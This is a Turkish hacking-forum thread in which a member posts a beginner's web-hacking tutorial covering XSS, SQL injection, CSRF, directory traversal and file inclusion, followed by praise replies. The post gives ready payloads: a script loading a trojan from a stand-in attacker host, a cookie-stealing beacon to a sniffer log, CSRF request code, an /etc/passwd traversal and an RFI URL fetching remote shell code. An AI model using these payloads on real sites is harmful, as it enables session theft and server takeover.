THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Web Sitelerinin Zayıflıkları~Hackleme Yöntemleri~Geniş Anlatım~Dev Konu

Kopril54 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Nereden:
Satürn
Mesajlar:
935
Konular:
53
Teşekkür (Etti):
61
Teşekkür (Aldı):
138
Ticaret:
(0) %
12-02-2017 19:59
#1
Post
Web Sitelerinin Zayıflıkları~Hackleme Yöntemleri~Geniş Anlatım~Dev Konu
Hepinize Tekrardan Merhaba Arkadaşlar;
Bugün Sizlere Web Sitelerinin Zayıflıklarını Anlatacağım;
Bu Bilgileri Web Hackle Uğraşan Birisinin Kesinlikle Bilmesi Gerekiyor,
Web Hackle Yeni Başlayanlar Yada Yükselmek İsteyenler için Umarım Yararlı Bi Konu Olucak,
Biraz Uzun Tutucağım Çünkü Bazıları Beğenemiyo Onlarında Beğenisini Kazanmak İçin Uzun Olucak,
Yine Çok Konuştum Hemen Başlıyorum.

Edit: Web Yazılımı = Web Sitesi (Web Sitesi Kodları)

Web Yazılımlarının Çalışmasını Anlamak;
İstemci Ve Sunucu Yazılımları Diğer Kullanıcı Ve Sistemler İle Http Protokolünü Kullanarak Haberleşirler.
Modern Yazılımlar Sunucu Taraflı (Server Side) Olarak Java, ASP, ASP.NET, PHP Ve CFML Ya Da Benzer Diller Ve Platformlar Üzerinde Arka Planda Veri Tabanına Bağlanarak Çalışır.

Yani Kısaca Anlatmak Gerekirse;


Giden Bağlantı<-----|------ |Web Sunucu|<----->Veri Tabanı Sunucuları
Gelen Bağlantı-------|----->|&Yazılım..... |<----->Veri Tabanı Sunucuları


Gibi Bir Grafik Çıkıyor (Resmini Bulamadım Bende Kendim Yaptım)

Web Yazılımlarına (Sitelerine) Gelebilecek Saldırılar;
XSS (Cross Site Scripting)
SQL Enjeksiyon
Komut Enjeksiyon
Çerez Ve Oturum Zehirleme (Cookie & Session Poisoning)
Parametre/Forum Değiştirme
Hafıza Taşması (Buffer Overflow),
Klasör Üzerinden Geçme (Directory Traversal),
Çerez Kurcalama,
Kimlik Doğrulama Çalma,
Sistem Olaylarının Değişmesi (Log Tampering),
Platform Saldırıları,
Web Servis Saldırıları,
DoS Saldırıları.

WebGoat
Webgoat OWASP (Open Web Application Security Project) Tarafından Hazırlanmış Olan İçinde Pek Çok Yazılım Bulunduran Bir Web Yazılımıdır.
Oluşturulma Amacı Web Yazılımlarına Gelebilecek Saldırılar Hakkında Bilgi Sahibi Olmayı Sağlamak Ve Açıkların Zararlarını Göstermektir.
Webgoat Web Yazılımlarının Zayıflıklarını Detaylı Olarak Görmek İsteyen Kişiler İçin İnternet Üstünde Bulunabilecek En Detaylı Kaynaktır.
Web Yazılımlarının Zayıflıklarını Anlatırken Ara sıra Webgoat Projesinden Faydalanıcağız.


Detaylı Bilgi; Detaylı Bilgi İçin

Kişisel Aracı (Proxy) Yazılımlar

Web Yazılımlarının Zayıflıklarının Tespitinde Çoğunlukla Kullanılmaktadırlar.
Web Yazılımı İle Web Tarayıcısı Arasındaki Tüm Trafiği Görüntülerler.
Bu Trafiğini Görüntülenmesi Web Yazılımının Analizi Ve Zayıflıklarının Tespiti İçin Kullanılabilir.
Bu Araçların En Önemli Özelliği Giden Ve Gelen HTTP Paketlerini Transfer Edilirken Düzenleye Bilmeleridir.


Önemli Proxy Yazılımları;

WebScarp
Webscarp Kişisel Proxy Özelliklerinin Yanında Pek Çok Özelliğe Sahip Web Yazılımlarının Zayıflıklarını Tespit Etmek Amaçlı Oluşturulmuş Bir Yazılımdır.
HTTP Paketlerini Analiz Ederek Değiştirilmesini Sağlar.
Çalışmasını Sağlamak İçin Web Tarayıcımızı Webscarp Yazılımına Yönlendirmemiz Gerekmektedir.

Webscarp Çalıştırıldıktan Sonra Browser Ayarlarında Proxy Sunucusu Seçeneklerine Webscarp Programının Kullandığı Port Adresine Yönlendirme Yapılır.
Yerel Ağ Ayarlarından,
Proxy Sunucusu Bölümündeki Adresi Ve B. Nok. (Portu) Yazılımdaki Listener Bölümündekilerle Eşlememiz Gerek.
Bu Şekilde Artık Webscarp HTTP Paketlerini İzlemeye Başlar Ve Tüm HTTP Trafiğinin Detaylarını Görüntüleyebilir.

Detaylı Bilgi; Daha Detaylı Bilgi Edinmek İçin

Paros Proxy
Windows İşletim Sistemleri İçin Ücretsiz Bir Kişisel Proxy Yazılımı Olan Paros Proxy Web Yazılım Güvenlik Testlerinde Kullanılan Önemli Yazılımlardan Biridir.
Web yazılımı İle Browser Arasındaki Giden Gelen HTTP Trafiğini Kontrol Ederek Değişiklik Yapmaya Olanak Tanır.

Detaylı Bilgi; Detaylı Bİlgi Ve İndirmek İçin

Pen Proxy
Java İle Yazılmış Ufak Bir Uygulama Olan Pen Proxy Diğerleri Gibi Web Yazılımlarının Testlerinde Kullanılan Ücretsiz Bir Kişisel Proxy'dir.
Detaylı Bilgi; Detaylı Bİlgi Ve İndirmek İçin

Web Yazılımlarına(Sitelerine) Gelebilecek Saldırılar

XSS (Cross Site Scripting)
XSS Web Yazılımlarında Veri Girişi Yapılan Alanlara Zararlı Kod Gönderilmesi İle Ortaya Çıkan Bir Zayıflıktır.
Genelde XSS Saldırısında Kullanılan Kodlar JavaScript'tir.
XSS Saldırısı Sayesinde Saldırganlar Web Sayfasının Başka Bir Siteye Yönlendirilmesini, Oturum Ve Çerez Bilgilerinin Çalınmasını Hatta Sayfayı Ziyaret Eden Kullanıcıların Sistemine Zararlı Yazılım Bulaştırılmasına Kadar Pek Çok Eylemi Gerçekleştirebilirler.

XSS Saldırısı İki Türde Yapılabilir


Depolanmış Saldırı (Stored Attack): Bu Saldırı Forum Tarzı Kullanıcıların Girdiği Metinlerin Veri Tabanında Tutulduğu Alanlara Yapılır.
Bu Şekilde Saldırgan O Sayfayı Ziyaret Eden Herkese Zararlı Kod Gönderebilir.


Yansıtılmış Saldırı (Reflected Attack): Zararlı Kodların BUlunduğu Sayfaya Kurbanın Yönlendirilmesini Sağlamaktır.
Kurbana Eposta Mesajları İle Yada Link Gönderilmesi İle Gerçekleşir.

XSS Saldırganlar Tarafından Yoğunlukla Forum Forum Yada Benzer Üyelik Gerektiren Web Yazılımlarında Zararlı Kodun Gönderildiği Sayfayı Ziyaret Eden Kurbanların Oturum Bilgilerini Çalmakta Kullanılır.


XSS Açığını Tespit Etmek
Kullanıcılardan Veri Beklenen Alanlara Aşağıda Belirtilen Kodların Gönderilmesi XSS Web Yazılımlarında XSS Açıklarının Tespit Edilmesini Sağlayacaktır.

1. <script>alert('XSS')</script>: Bir Uyarı Mesajı Çıkartarak İçinde XSS Yazılmasını Sağlar.


2. <script src=http://www.hacker.com/trojan.js></script>: XSS Açığından Faydalanarak Web Yazılımı Ziyaret Eden Kullanıcılara Başka Bir Site Üstündeki Zararlı Kodu Yükleyebilir.
3. <script>alert(documen t.cokie);</script>(Arada Boşlık Olmaması Lazım): Web Yazılımının Çerez Bilgisinin Ekrana Uyarı Kutusu İçinde Görüntülenmesini Sağlar.
4. XSS Açığı İle Çerez Çalma: Çerezler (Cookie) Zayıf HTTP Protokolünün Oturum Durumunun Kontrolünü Ve Kimlik Doğrulamayı Sağlayan Zayıf Bileşenlerdir.
Saldırgan Eğer Sayfayı Ziyaret Eden Kullanıcıların Çerez Bilgisini Okuyup Kaydebilirse Kendi Bİlgileri İle Yerlerini Değiştirip Kurbanın Yetkilerine Ulaşabilir.
Bu İşlemi XSS Açığı Bulunan Web Yazılımını Ziyaret Eden Herkesin Çerez Bilgilerini Başka Bir Web Yazılımına Kaydeden Bir JavaScript Kodu Gönderek Gerçekleştirebilir.
Aşşağıda Belirtilen JavaScript Kodu Sayfayı Ziyaret Eden Kullanıcıların Bilgilerini Bir Başka Web Yazılımına Kaydedilmesini Sağlamaktadır.

<img src="http://old.anti chat.ru/cgi-bin/s.jpg"> (Boşluk Olmayacak Şekilde)
Ve Saldırgan Daha Sonra XSS Açığını Kullanarak Aldığı Çerez Bilgilerini Aşağıda Belirtilen Adresten Okuyabilir Yada Kendi Çerez Bilgileri İle Değiştirebilir.
Site; http://old.antichat.ru/sniff/log.php(Sanırım Site Kapanmış Ama Bunun Gibi Siteler Var)
Bazı Çerez Bilgileri İçinde Kullanıcı Adı VE Şifre Gibi Önemli Bilgilerin Tutulduğunu Düşünürsek XSS Açıklarının Nekadar Zararlı Olabiliceğini Anlamış Oluruz.
Saldırgan Elde Ettiği Bu Bilgiler İle İnternet Üzerinden "Ücretsiz" Bulabiliceği Cookie Editor Yazılımları İle Kendi Çerez Bilgilerini De Kolayca Değiştirip Kurbanın Yetkilerine Ulaşabilir.

5. XSS Açıkları Url Üzerindende Tespit Edilebilir:
http://www.kurbanurl.com/members.php?id=<script>alert('XSS')</script>

Genelde XSS Kodları <script>, <applet>, <object> Ve <embed> Kodları İçinde Web Yazılımına Gönderilir.
6.<script type="text/javascript">
<!--
window.locatio n=http://www.google.com/"
//-->
</script>
Yukarıda Belirtilen Örnek JavaScript Kodu XSS Açığı Olan Bu Web Sayfasına Giren Kullanıcıları Google Sitesine Yönlendirmektedir.

8. <iframe src=http://www.google.com.tr<: Web Sayfasının İçinde Başka Bir Çerçeve İçinde Google Adresine Yönlendirme Yapar.
Bu Şekilde Saldırgan İstediği Zararlı Kodu ActiveX Ve Benzri Yöntemlerle Sisteme Bulaştırabilir.



9. Saldırganlar Web Yazılımlarındaki XSS Zayıflıklarını Tespit Etmeye Çalışırken Web Yazılımcılarının Olası Script Girişlerini Engellemek İçin Kullandıkları Yöntemleri Anlamaya Ve Aşmaya Çalışırlar.
XSS Saldırısını Evrensel Kod'a Dönüştürmek Saldırının Maskelenmesini Sağlayabilir.

Örneğin Aşşağıda Bir XSS Saldırı Yöntemi Ve Onun Evrensel Kod'a Dönüştürülmüş Hali Görüntülenmektedir.

<script>alert("XSS")</script>
<script>alert('XSS')</script > (Boşluk Olmayacak Şekilde)

Saldırganlar Bu Şekilde Web Yazılımcılarının Filtreleme Yapabileceklerini Düşünerek XSS Saldırılarını Farklı Bir Şekilde Web Yazılımına Göndermeye Çalışırlar.
Detaylı Bilgi; XSSed | Cross Site Scripting (XSS) attacks information and archive


SQL Enjeksiyon (SQL İnjection)
SQL Enjexiyon Kötü Amaçlı SQL Komutlarının Web Yazılımına Gönderilmesi Sonucunda Ortaya Çıkan Zayıflıktır.
Saldırgan Zayıf Olan Web Yazılımını SQL Komutlarını Kullanarak Veri Tabnında Bulunan Bilgileri Ele Geçirebilir.
SQL Saldırısı Genelde Kullnıcı Girişlerinin Yapıldığı Alanlardan Ve URL Bölümlerinden Yapılır.


SQL Açıklarını Tespit Etmek
SQL Açıklarını Tespit Etmek Amaçlı Kullanılan En Temel Komutlardan Biri Şifre, Kullanıcı Yada URL Alanlarına Denenebilecek Olan Aşağıda Belirtilen Komuttur.
[ ' ] Tek Tırnak Bir Web Yazılımında Açık Olup Olmadığını Algılamak İçin En Temel Koddur.
Çünkü Tek Tırnaktan Sonra Yazılan Metin, Web Yazılımı Tarafından İşlenmesi Gereken Bir SQL Komutu Olarak Algılanır.
Bu Koda Web Yazılımı Hata İle Cevap Veriyorsa Web Yazılımında SQL Açığı Olduğunun Kanıtıdır.
Alttaki Resimde Urlden SQL Açığı Taranmış.

Burada Da; KullanıcıAdı / Şifre Kısmından SQL Açığı Taranmış

Burada İse; Eğer Açık Varsa BU Hata Alınmış (Yada Buna Benzer Hatalar Alınabilir).


Web Yazılımınız (Web Siteniz) Eğer Yukarıdaki Girişlere Hata Mesajı Veriyor İse Bu Sunucunun Üzerindeki VeriTabanları Tehlike Altında Demektir.
SQL Komutları İle VeriTabanındaki Tüm Bilgilere Ulaşılabilir.
SQL Enjeksiyon Hakkında Detaylı Bilgiye Bi Sonraki Konumdan Ulaşabileceksiniz (Bu Konudan Sonra Onu Yazıcam).


Komut Enjeksiyon
Kötü Amaçlı Kodun Web Yazılımından Diğer Yazılımlara Geçişini Sağlamaktır.
Saldırganın SQL Ve Diğer Açıklar Aracılığı İle Sistem Çağrılarını (System Calls) Kullanarak Komut Göndermesi Sonucu Komut Enjeksiyon Meydana Gelir.
Perl, Python Ve Diğer Diller İle Yazılmış Kötü Amaçlı Kodların Sisteme Gönderilmesi Sağlanır.
Bu Saldırı Sırasında Zararlı Kodun Gönderilmesi İçin Bir Aracı (Proxy) Yazılıma İhtiyaç Duyulabilir.


Hafıza Taşması (Buffer Overflow)
Web Yazılımlarının Çalışma Anını Bozmakta Kullanılır.
Hafıza Taşması Saldırılarını Tespit Etmek Web Yazılımlarında Zordur.
Bilinen Tüm Web Yazılımları Bu Tarz Saldırılara Karşı Açıktır.
Sadece Java Bu Tür Saldırılara Karşı Ekstra Güvenlik Sağlamaktadır.
Bu Yüzden Java Yazılım Dilleri Arasında En Güvenli Olarak Bilinir.
Saldırıyı Yapabilmek İçin http://www.turkhackteam.org/program-...-dev-konu.html/\http://www.turkhackteam.org/web-serv...-dev-konu.html Bu Konulardan Hafıza Taşması Bölümüne Bakın.


Klasör Üzerinden Geçme (Directory Traversal)
Bu Saldırı Türü Web Yazılımı Dışında Saldırgan Web Sunucunun Klasör Yapısını Görüntüleyebiliyorsa Ortaya Çıkar.
Saldırgan Bu Şekilde Web Sunucunun Klasör Ve Dosya Yapısı Hakkında Bilgi Alabilir Ve Dosyaları Görüntüleyebilir.
(Bu Açık Hakkında Çok Fazla Bir Bilgi Yok Ama Genelde Admin Paneli Bulmak İçin Kullanıla Biliyor)

Sitenin Ana Sayfa Url'si; http://www.hedefsite.com/makaleler/makale1.html
Sitede Açık Varsa Açıklı Url; http://www.hedefsite.com/makaleler


2. Url'den "makaleler" Dizinine Girebiliyorsa Ve Klasörleri Görüntüleye Biliyorsa Açık Vardır.
Bu Açıkla Sunucu Yapısı Hakkında Baya Detaylı Bilgilere Ulaşılabilir.


Çerez Kurcalama (Cookie Snooping)
Web Yazılımcıları Çerez Bilgilerini Korumak İçin Sıklıkla Çerezleri Şifrelerler.
Kolaylıkla Şifreleri Çözülebilen Yöntemler Olan Rot13 Ve base64 Kullanılması Çerezlerin Zarar Görmesine Ve Diğer Kullanıcıların Yetkilerine Erişilmesini Sağlar.
Çerez Bilgileri İstemci Tarafında Tutulduğundan, Saldırganlar Çerez Bilgilerini Kolayca Değiştirebilir Ve İstediği Kullanıcının Yetkilerine Ulaşabilir.


Kimlik Doğrulama Çalma (Authentication Hijacking)
Forum Tabanlı Kimlik Doğrulama Sağlayan Web Yazılımlarına Şifre Deneyebilecek Pek Çok Yazılım Bulunmaktadır.
Kullanıcı Adı Ve Şifre Girişi Bölümlerine Yapılabilecek Saldırılar İle Kullanıcı Hesapları Ele Geçirilebilir.
Saldırganın Herhangi Bir Kullanıcı Adını Bilmesi Form Alanlarına Hızlı Bir Şekilde Şifre Denemesine Olanak Vermektedir.

Web Tabanlı Kimlik Doğrulama Türlerine Saldırı Metodlarını İlerleyen Yazılarımda Detaylı Olarak İnceleyeceğiz.


Sistem Olaylarının Değiştirilmesi
Saldırganların Sistem Ve Web Yazılımlarının Olası Kayıtlarını Değiştirmelerine Karşı Sistem Olaylarının Güvenliğinin Sağlanması Gerekmektedir.
Sistem Kayıtlarının Değiştirilmesi Saldırganların İzlerini Temizlemelerini Sağlayacaktır.


O Gün Saldırıları (Zero Day Attacks)
0 Gün Saldırıları Bir Zayıflığın Güvenlik Uzmanı Ve Saldırgan Tarafından Bulunması Ve Üreticinin Bu Açığı Kapatmak İçin Güncellemeyi Sağlaması Arasında Geçen Sürede Gerçekleşir.
O Gün Saldırısında Üretici Herhangi Bir Güncelleme Hazırlayıncaya Kadar Alınabilicek Çok Fazla Güvenlik Önlemi Bulunmamaktadır.
(O GÜn Saldırılarında Genelde Exploitler Kullanıldırğından Sadece Bilgi Vermek İstedim)


CSRF
CSRF (Cross Site Request Forgery) XSS'e Çok Benzer Olması Sebebiyle XRSF Olarak Da Adlandırılır.
Web Tarayıcıların Kullanıcılara Olan Güven Zafiyetini Kullanarak Gerçekleştirilmektedir.
CSRF Saldırılarında Kullanılan Örnek Kodlar

HTML Metodları;
İMG SRC: <img src="http://hedefsite.com/?komut">
SCRİPT SRC: <script src"http://hedefsite.com/?komut">
İFRAME SRC: <iframe src="http://hedefsite.com/?komut">

JavaScript Metotları;
'İmage' Object:
<script>
var foo= new Image();
foo.src="http://hedefsite.com/?komut";
</script>

'XMLHTTP' Object;
İnternet Explorer:
<script>
var post_data='name=vaule';
var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
xmlhttp.open("POST", 'http://hedefsite.com /?komut',true);
xmlhtp.onereadtstatechange = function (){
if (xmlhttp.readyState == 4)
{
alert(xmlhttp.responseText);
}
};
xmlhttp.send(post_data)
</scrip t>
(Boşluksuz.)
Firefox:
<script>
var post_data='name=vaule';
var xmlhttp=new XMLHttpRequest();
xmlhttp.open("POST", 'http://hedefsite.com /?komut',true);
xmlhtp.onereadtstatechange = function (){
if (xmlhttp.readyState == 4)
{
alert(xmlhttp.responseText);
}
};
xmlhttp.send(post_data)
</scrip t>
(Boşluksuz.)


CSRF Açıklarına En Önemli Örnek;
Gmail Kullanıcılarının Bilgilerinin CSRF İle Çalınması (Ocak 2007)
Google Alan Adı Üzerindeki Bir URL'den, Tüm Gmail Kulanıcı İletişim Bilgilerinin Alınmasını Sağlayan Bir CSRF Açığı Ocak 2007'de Raporlanmıştır
İlgili URL'ye Korsan Bİr İstek Gönderildiğinde Dönen Sayfada Kullanıcı Bilgilerinin Görüntülenmesi Sağlanıyordu.

Bu Örnekler Dışında Birçok Popüler Web Yazılımında, Yakın Geçmişte CSRF Zafiyeti Tespit Edilmiştir.


RFI & LFİ
File İnclusion: Dosya Ekleme Olarak Tabir Edilebilen Bir Zayıflıktır.
File İnclusion Saldırıları, PHP Web Yazılım Dilinde Karşılaşılan Bir Güvenlik Açığıdır.
Kötü Niyetli Saldırganın, Yerel (local) Ve Uzaktan (Remote) Kod Çalıştırmasına Olanak Sağlar.

RFI (Remote File İnclusion): Uzaktan Dosya Ekleyerek Kod Çalıştırmaktır
LFI (Locl File İnclusion): Yerelden Dosya Ekleyerek Kod Çalıştırmaktır.

PHP Web Programlama Dili İle Kodlanmış Sitelerde, Yazılımcıların Tanımladıkları Değişkene Değer Atamaması Yada Atanan Değerin Filtrelenmemesinden Kaynaklanmaktadır.
Aşşağıdaki Örnek Kod Satırları İle Detayları Uygulamalı Olarak İnceleyelim.


LFI (Local File İnclusion) Örnek;
index.php:
<?php
include($_GET['sayfa'])
?>
Bu Gibi Bağlantılar İçeren Bir Web Sitesinde Aşşağıdaki Gibi Bağlantı İstekleri Oluşturulur:

index.php?sayfa=haberler.php
index.php?sayfa=duyurular.php
En Basit Görünümüyle Böyle Bi Yazılım, LFI (Local File İnclusion) Zayıflığını Oluşturur.

index.php?sayfa=../../../../../../../../../etc/passwd
Yukarıdaki "../" İfadesi Bulunduğu Dizinden Bir Üst Dizinde Çıkmayı Sağlar Ve /etc/passwd İçeriğini Ekrana Yazdırır.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
.........


RFI (Remote File İnclusion) Örnek;
index2.php:
include ("$duyurular/guncel/duyuru.php");
Bu Satırdaki "$" İşareti Bulunan Parametrelerden Doğan Hatalı Kodlama İle Uzaktan Dosya Çağırmak Mümkündür.
"http://www.hedefsite.com/labs/index2.php?duyurular=http://saldırgan.net/listpatch.txt?"
Yukarıdaki Şekilde, http://saldırgan.net/listpatch.txt? Adresinde Bulunan Zararlı kodlar www.hedefsite.com Adresi Üzerinde Çalıştırılacaktır.
Bu Noktada Saldırgan Yönlendirilen Alanda SHELL Ve ListPatch İsimleriyle Tabir Edilen Kötü Amaçlı Kodları Kullanarak Sunucu Üzerinde İstenilen İşlemleri Gerçekleştirebilmektedir.
Bunların En Çok Kullanılanları R57 Ve C99'dur.


Bu Günkü Konumun Da Burada Sonuna Gelmiş Oluyoruz.
Umarım Sıkılmadan Okumuşsunuzdur (Biraz Fazla Uzun Oldu Ama Geniş Ve En Kapsamlı Şekişilde Anlatmaya Çalıştım),
Ben Bunları Bulmak İçin Baya Araştırma Yaptım, Yazma Desen 1-2 Günümü Aldı (ciddi Ciddi 1.5 Gün Falan Oldu), 1 Teşekkürü Çok Görmezsiniz Umarım Ve Konu Sabitlenmeye Değer Bence.
Bir Daha Ki Konumda Web Yazılımlarına Saldırıda Kullanılan Araçlar Diye Bi Konuyu Ele Alıcağım,
Diğer İşlerimide Aksatmadan Artık Her Hafta (Dahada Fazla) Yazı Atmaya Çalışıcam, Maksat Yeni Arkadaşlarımız Yada Bilmeyen Ve Merakı Olan Arkadaşlarımızın Bilgilenmesidir.
Sevgiyle Kalın Hepinize Hayırlı Günler, İyi Forumlar Dilerim.
--------------------- ~ஐ◄███▓▒░ MUSTAFA KEMAL ATATÜRK ░░▒▓███~

Yazdığım kitabın kahramanı benim...
BrainHackZ - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2014
Mesajlar:
1.533
Konular:
221
Teşekkür (Etti):
354
Teşekkür (Aldı):
502
Ticaret:
(0) %
12-02-2017 20:04
#2
Güzel konu ellerine sağlık.
PashaReyiz - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
------------
Yaş:
26
Mesajlar:
1.719
Konular:
175
Teşekkür (Etti):
289
Teşekkür (Aldı):
313
Ticaret:
(0) %
12-02-2017 20:06
#3
Ellerine Sağlık Kusursuz Olmuş.
--------------------- 2013-2018
FordusGM - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2016
Nereden:
Nereye :)
Mesajlar:
798
Konular:
50
Teşekkür (Etti):
203
Teşekkür (Aldı):
138
Ticaret:
(0) %
12-02-2017 20:07
#4
Hepsini senmi yazdın sen yazdıysan helal olsun ellerine sağlık yani
---------------------
FordusGM

Ağlayacaksanız Oynamayalım.
Kopril54 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Nereden:
Satürn
Mesajlar:
935
Konular:
53
Teşekkür (Etti):
61
Teşekkür (Aldı):
138
Ticaret:
(0) %
12-02-2017 20:18
#5
Smile
Alıntı:
FordusGM´isimli üyeden Alıntı Mesajı göster
Hepsini senmi yazdın sen yazdıysan helal olsun ellerine sağlık yani
Anlatımların Tamamı Bana Ait Değil Ama, Kesinlikle Kopyala Yapıştır Yok 0'dan Kendim Yazdım
--------------------- ~ஐ◄███▓▒░ MUSTAFA KEMAL ATATÜRK ░░▒▓███~

Yazdığım kitabın kahramanı benim...
FordusGM Teşekkür etti.
FordusGM - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2016
Nereden:
Nereye :)
Mesajlar:
798
Konular:
50
Teşekkür (Etti):
203
Teşekkür (Aldı):
138
Ticaret:
(0) %
12-02-2017 20:19
#6
Alıntı:
Kopril54´isimli üyeden Alıntı Mesajı göster
Anlatımların Tamamı Bana Ait Değil Ama, Kesinlikle Kopyala Yapıştır Yok 0'dan Kendim Yazdım
Helal olsun sana başarılarının devamını siler iyi forumlar dilerim...
---------------------
FordusGM

Ağlayacaksanız Oynamayalım.
AJEXA - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
06/2013
Nereden:
Jüpiter
Mesajlar:
6.925
Konular:
369
Teşekkür (Etti):
1145
Teşekkür (Aldı):
2470
Ticaret:
(0) %
12-02-2017 20:25
#7
Valla ben bizzat şahitim. Kendisi yazdı. Eline sağlık koprilim.
Kopril54 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Nereden:
Satürn
Mesajlar:
935
Konular:
53
Teşekkür (Etti):
61
Teşekkür (Aldı):
138
Ticaret:
(0) %
12-02-2017 20:31
#8
Alıntı:
FordusGM´isimli üyeden Alıntı Mesajı göster
Helal olsun sana başarılarının devamını siler iyi forumlar dilerim...
Teşekkürler Devamını Silmeseydin iyiydi

Alıntı:
AJEXA´isimli üyeden Alıntı
Valla ben bizzat şahitim. Kendisi yazdı. Eline sağlık koprilim.
Sağol Ajexa
--------------------- ~ஐ◄███▓▒░ MUSTAFA KEMAL ATATÜRK ░░▒▓███~

Yazdığım kitabın kahramanı benim...
GoldPack - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
798
Konular:
91
Teşekkür (Etti):
44
Teşekkür (Aldı):
62
Ticaret:
(0) %
12-02-2017 20:38
#9
Eline sağlık
--------------------- Susmak En Büyük Cevap
I am nobody - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Mesajlar:
1.076
Konular:
97
Teşekkür (Etti):
230
Teşekkür (Aldı):
314
Ticaret:
(0) %
12-02-2017 20:40
#10
Eline saglik kardesim sirf bu emek icin tesekkur butonuna basilir

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler